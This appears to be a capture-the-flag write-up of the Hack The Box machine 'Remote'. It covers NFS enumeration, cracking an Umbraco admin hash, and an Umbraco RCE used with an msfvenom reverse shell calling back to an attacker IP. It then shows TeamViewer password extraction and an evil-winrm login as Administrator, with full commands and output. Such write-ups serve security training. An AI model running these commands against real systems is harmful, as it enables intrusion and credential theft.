TL;DR
- Mount NFS share and find credentials to login as admin on Umbraco (CMS)
- Exploit RCE on Umbraco to get a shell
- Find Team Viewer credentials and connect as Administrator with Windows Remote Management
User.txt
Reconnaissance
Let’s start by a Nmap scan:
magnussen@funcMyLife:~/remote$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN remote.txt 10.10.10.180
# Nmap 7.60 scan initiated Fri Jul 10 12:56:46 2020 as: nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN remote.txt remote.htb
Increasing send delay for 10.10.10.180 from 0 to 5 due to 142 out of 473 dropped probes since last increase.
Increasing send delay for 10.10.10.180 from 5 to 10 due to 181 out of 601 dropped probes since last increase.
Warning: 10.10.10.180 giving up on port because retransmission cap hit (10).
Nmap scan report for remote.htb (10.10.10.180)
Host is up, received echo-reply ttl 127 (0.18s latency).
Scanned at 2020-07-10 12:56:46 CEST for 217s
Not shown: 53899 closed ports, 11621 filtered ports
Reason: 53899 resets and 11621 no-responses
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp open rpcbind syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3,4 2049/tcp nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/udp mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100024 1 2049/tcp status
|_ 100024 1 2049/udp status
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
2049/tcp open mountd syn-ack ttl 127 1-3 (RPC #100005)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49678/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49679/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49680/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 45222/tcp): CLEAN (Couldn't connect)
| Check 2 (port 57430/tcp): CLEAN (Couldn't connect)
| Check 3 (port 33056/udp): CLEAN (Failed to receive data)
| Check 4 (port 15893/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-07-10 13:04:43
|_ start_date: 1601-01-01 00:09:21
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 10 13:00:23 2020 -- 1 IP address (1 host up) scanned in 217.56 seconds
So we find 5 useful services:
- FTP (21)
- IIS (80)
- SMB (445)
- RPCBind (2049)
- WinRM (5985)
The website is some kind of blog.
We can log in with anonymous:anonymous on the FTP server but there’s nothing interesting.
NFS
We saw a listening service on port 2049, let’s start by listing the NFS shares on the box.
NFS (Network File System) is a file system protocol allowing a user to access files over a network much like local storage is accessed. It’s build on the Open Network Computing Remote Procedure Call (ONC RPC) system.
magnussen@funcMyLife:~/remote$ showmount -e remote.htb
Export list for remote.htb:
/site_backups (everyone)
Nice, we have a share called site_backups that’s available to everyone. Let’s mount it and dig into it.
magnussen@funcMyLife:~/remote$ mount -o hard,nolock remote.htb:/site_backups ./nfs_mount/
magnussen@funcMyLife:~/remote$ ls -alh nfs_mount/
total 123K
drwx------ 2 nobody 4294967294 4,0K févr. 23 19:35 .
drwxrwxr-x 4 magnussen magnussen 4,0K juil. 9 15:10 ..
drwx------ 2 nobody 4294967294 64 févr. 20 18:16 App_Browsers
drwx------ 2 nobody 4294967294 4,0K févr. 20 18:17 App_Data
drwx------ 2 nobody 4294967294 4,0K févr. 20 18:16 App_Plugins
drwx------ 2 nobody 4294967294 64 févr. 20 18:16 aspnet_client
drwx------ 2 nobody 4294967294 48K févr. 20 18:16 bin
drwx------ 2 nobody 4294967294 8,0K févr. 20 18:16 Config
drwx------ 2 nobody 4294967294 64 févr. 20 18:16 css
-rwx------ 1 nobody 4294967294 152 nov. 1 2018 default.aspx
-rwx------ 1 nobody 4294967294 89 nov. 1 2018 Global.asax
drwx------ 2 nobody 4294967294 4,0K févr. 20 18:16 Media
drwx------ 2 nobody 4294967294 64 févr. 20 18:16 scripts
drwx------ 2 nobody 4294967294 8,0K févr. 20 18:16 Umbraco
drwx------ 2 nobody 4294967294 4,0K févr. 20 18:16 Umbraco_Client
drwx------ 2 nobody 4294967294 4,0K févr. 20 18:16 Views
-rwx------ 1 nobody 4294967294 28K févr. 20 06:57 Web.config
Cool, we have access to a backup of the website. If we dig into it, we find an interesting file: App_Data/Umbraco.sdf.
If we check its content we find some credentials:
magnussen@funcMyLife:~/remote$ head nfs_mount/App_Data/Umbraco.sdf
��V�t�t�y���Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d��׃rf�u�rf�v�rf���rf����X�v�������adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50��BiIf�hVg�v�rf�hVg����X�v�������adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f�[{"alias":"umbIntroIntroduction","completed":false,"disabled":true}]��?�g�.og���g����X�v�������smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e��?�g�Ag�.og�Og����Y�w�������ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749��~�
g�)�
After breaking the hash (b8be16afba8c314ad33d812f22a04991b90e2aaa) with crackstation we find: baconandcheese.
We can log in to http://http://remote.htb/Umbraco
with: admin@htb.local:baconandcheese.
RCE on Umbraco
Once we’re log in, we find Umbraco’s version: 7.12.4.
If we google for exploit, we find the following script: https://github.com/noraj/Umbraco-RCE
.
Let’s start by creating a reverse shell executable with msfvenom:
magnussen@funcMyLife:~/remote$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.158 LPORT=7777 -f exe > magnussen.exe
Let’s upload our reverse shell on the server by using http://remote.htb/Umbraco#/media
.
Now we have to locate our file on the box and execute our reverse shell:
magnussen@funcMyLife:~/remote$ python3 exploit.py -u "admin@htb.local" -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a '-NoProfile -Command ls C:/inetpub/wwwroot/Media/1033'
Directory: C:\inetpub\wwwroot\Media\1033
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/10/2020 1:31 PM 73802 magnussen.exe
magnussen@funcMyLife:~/remote$ msfconsole
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.15.158
LHOST => 10.10.15.158
msf5 exploit(multi/handler) > set LPORT 7777
LPORT => 7777
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.15.158:7777
magnussen@funcMyLife:~/remote$ python3 exploit.py -u "admin@htb.local" -p baconandcheese -i http://10.10.10.180 -c powershell.exe -a 'C:/inetpub/wwwroot/Media/1033/magnussen.exe'
msf5 exploit(multi/handler) >
[*] Started reverse TCP handler on 10.10.15.158:7777
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.180
[*] Command shell session 1 opened (10.10.15.158:7777 -> 10.10.10.180:49687) at 2020-07-10 19:31:13 +0200
C:\windows\system32\inetsrv>
Yeah! We have a shell, let’s go get that user.txt.
C:\windows\system32\inetsrv> cd c:\Users\Public
c:\Users\Public>type user.txt
type user.txt
2cc0eb5c564ee64f6f01d6273d920b53
I AM ROOT
Teamviewer & WinRM
Just have to privesc now, first of all let’s check the running processes:
c:\Users\Public> tasklist
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 8 K
System 4 0 148 K
Registry 104 0 23,208 K
smss.exe 300 0 1,220 K
csrss.exe 408 0 5,552 K
wininit.exe 488 0 6,820 K
csrss.exe 496 1 4,736 K
winlogon.exe 588 1 14,260 K
services.exe 628 0 9,976 K
lsass.exe 648 0 13,980 K
svchost.exe 772 0 3,756 K
svchost.exe 796 0 14,524 K
fontdrvhost.exe 820 0 4,024 K
fontdrvhost.exe 828 1 4,284 K
svchost.exe 916 0 10,224 K
svchost.exe 960 0 6,992 K
dwm.exe 268 1 32,976 K
svchost.exe 564 0 8,060 K
svchost.exe 1032 0 5,864 K
svchost.exe 1092 0 11,580 K
svchost.exe 1156 0 5,624 K
svchost.exe 1224 0 15,400 K
vmacthlp.exe 1300 0 6,340 K
svchost.exe 1344 0 7,808 K
svchost.exe 1372 0 7,396 K
svchost.exe 1388 0 5,520 K
svchost.exe 1396 0 11,048 K
svchost.exe 1416 0 9,012 K
svchost.exe 1424 0 7,404 K
svchost.exe 1568 0 5,708 K
svchost.exe 1604 0 14,052 K
svchost.exe 1640 0 11,400 K
svchost.exe 1668 0 8,804 K
svchost.exe 1676 0 8,456 K
svchost.exe 1768 0 8,108 K
svchost.exe 1792 0 8,476 K
svchost.exe 1944 0 6,912 K
svchost.exe 1992 0 7,716 K
svchost.exe 1468 0 15,748 K
svchost.exe 2084 0 8,084 K
svchost.exe 2108 0 8,412 K
svchost.exe 2276 0 7,776 K
svchost.exe 2284 0 7,268 K
spoolsv.exe 2668 0 16,268 K
svchost.exe 2720 0 10,736 K
svchost.exe 2728 0 12,284 K
svchost.exe 2736 0 24,904 K
svchost.exe 2756 0 12,324 K
svchost.exe 2784 0 19,920 K
inetinfo.exe 2796 0 17,448 K
svchost.exe 2868 0 6,532 K
svchost.exe 2888 0 8,296 K
svchost.exe 2952 0 6,176 K
svchost.exe 2964 0 5,348 K
vmtoolsd.exe 2972 0 18,104 K
VGAuthService.exe 2980 0 10,264 K
svchost.exe 3000 0 12,240 K
svchost.exe 3060 0 7,364 K
TeamViewer_Service.exe 1204 0 18,724 K
svchost.exe 1720 0 10,708 K
MsMpEng.exe 2080 0 134,228 K
svchost.exe 2384 0 11,668 K
svchost.exe 3088 0 12,584 K
nfssvc.exe 3380 0 5,328 K
svchost.exe 3692 0 12,156 K
dllhost.exe 3396 0 13,336 K
msdtc.exe 4376 0 10,440 K
WmiPrvSE.exe 4920 0 18,384 K
LogonUI.exe 4936 1 42,808 K
svchost.exe 5872 0 5,388 K
w3wp.exe 5316 0 349,928 K
svchost.exe 1620 0 12,044 K
svchost.exe 992 0 14,124 K
svchost.exe 868 0 13,000 K
svchost.exe 352 0 33,100 K
SearchIndexer.exe 1120 0 19,932 K
svchost.exe 2676 0 11,528 K
svchost.exe 1776 0 10,168 K
svchost.exe 2772 0 5,864 K
svchost.exe 816 0 7,376 K
magnussen.exe 1080 0 3,724 K
cmd.exe 2828 0 4,748 K
conhost.exe 2692 0 10,840 K
WmiPrvSE.exe 3096 0 8,256 K
tasklist.exe 4944 0 7,828 K
Mmmh, the TeamViewer service might be interesting.
While searching for exploit on Teamviewer I’ve found this really amazing article.
We might be able to retrieve TeamViewer password as the AES key is known, we even have a metasploit exploit for that. Let’s run it!
meterpreter > run post/windows/gather/credentials/teamviewer_passwords
[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
[+] Passwords stored in: /home/magnussen/.msf4/loot/20200710194708_default_10.10.10.180_host.teamviewer__202492.txt
[*] <---------------- | Using Window Technique | ---------------->
[*] TeamViewer's language setting options are ''
[*] TeamViewer's version is ''
[-] Unable to find TeamViewer's process
Yes! We have the password (!R3m0te!)!
We saw earlier that WinRM is available, let’s connect with evilWinRM by using this password with the Administrator account.
WinRM (Windows Remote Management) is a built-in remote management protocol that allows us to execute commands remotely.
magnussen@funcMyLife:~/remote$ ./evil-winrm.rb -i 10.10.10.180 -u Administrator -p '!R3m0te!'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/10/2020 1:18 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
6e9e9a86aa92b84a6ebd307b78691bc6
I AM ROOT!
This was a great box, not very difficult but I’ve learned a lot on Windows thanks to it! Thanks Mrb3n for the box!